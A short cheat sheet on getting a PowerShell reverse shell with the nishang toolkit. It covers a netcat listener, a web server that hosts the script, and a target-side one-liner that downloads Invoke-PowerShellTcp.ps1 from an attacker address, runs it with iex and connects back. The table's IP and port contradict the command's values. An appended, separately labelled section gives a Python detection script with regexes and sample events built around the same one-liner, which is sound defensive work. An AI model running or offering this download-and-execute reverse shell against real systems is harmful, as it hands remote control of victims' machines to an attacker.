
PowerShell - Reverse Shell (2)

Source of ps1 scripts

  • sudo git clone https://github.com/samratashok/nishang /opt/nishang

On hacker machine

listener

nc -nvlp 4444

static web server (expose /opt/nishang/Shells)

python3 -m http.server

On target machine

powershell iex (New-Object Net.WebClient).DownloadString('http://11.22.33.44:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 11.22.33.44 -Port 4444

| Key | Description |
| --- | --- |
| http://10.18.9.175:8000/ | server that delivers the script |
| -IPAddress 10.18.9.175 | local/hacker machine |
| -Port 4443 | local/hacker machine |
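
Seen from the defender's side, the target-side one-liner above leaves a recognisable process command line. The following is an added example, not part of the original page or of nishang: a small triage script that scores process-creation command lines against the elements of that one-liner. The function names, the threshold and the sample events (shaped like Sysmon Event ID 1 fields) are assumptions constructed for illustration.

```python
import re

# Indicators drawn from the target-side one-liner on this page (matched case-insensitively).
INDICATORS = {
    "download_cradle": re.compile(r"Net\.WebClient\)?\s*\.\s*DownloadString", re.I),
    "invoke_expression": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "remote_ps1": re.compile(r"https?://[^\s'\"]+\.ps1", re.I),
    "nishang_function": re.compile(r"Invoke-PowerShellTcp\b", re.I),
    "reverse_args": re.compile(r"-Reverse\b.*-IPAddress\s+\S+.*-Port\s+\d+", re.I),
}
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")


def score_command_line(cmdline):
    """Return the sorted indicator labels that match one command line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))


def triage(events, threshold=2):
    """Return (host, hits) for PowerShell process events with >= threshold hits."""
    alerts = []
    for ev in events:
        if not ev["Image"].lower().endswith(POWERSHELL_IMAGES):
            continue
        hits = score_command_line(ev["CommandLine"])
        if len(hits) >= threshold:
            alerts.append((ev["Computer"], hits))
    return alerts


# Constructed sample events shaped like Sysmon Event ID 1 fields; hosts and
# addresses (192.0.2.0/24 documentation range) are made up for this example.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Computer": "WS01", "Image": PS, "CommandLine":
        "powershell iex (New-Object Net.WebClient).DownloadString("
        "'http://192.0.2.10:8000/Invoke-PowerShellTcp.ps1');"
        "Invoke-PowerShellTcp -Reverse -IPAddress 192.0.2.10 -Port 4444"},
    {"Computer": "WS02", "Image": PS, "CommandLine":
        r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"Computer": "WS03", "Image": PS, "CommandLine":
        'powershell -c "Invoke-WebRequest https://example.com/tool.zip -OutFile tool.zip"'},
    {"Computer": "WS04", "Image": PS, "CommandLine":
        "powershell IEX (new-object net.webclient).downloadstring('http://192.0.2.20/a.ps1')"},
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(hits)}")
```

Requiring at least two indicators keeps a lone `iex` or a lone `.ps1` URL from alerting on its own; the same patterns can be applied to PowerShell script block logging (Event ID 4104) text.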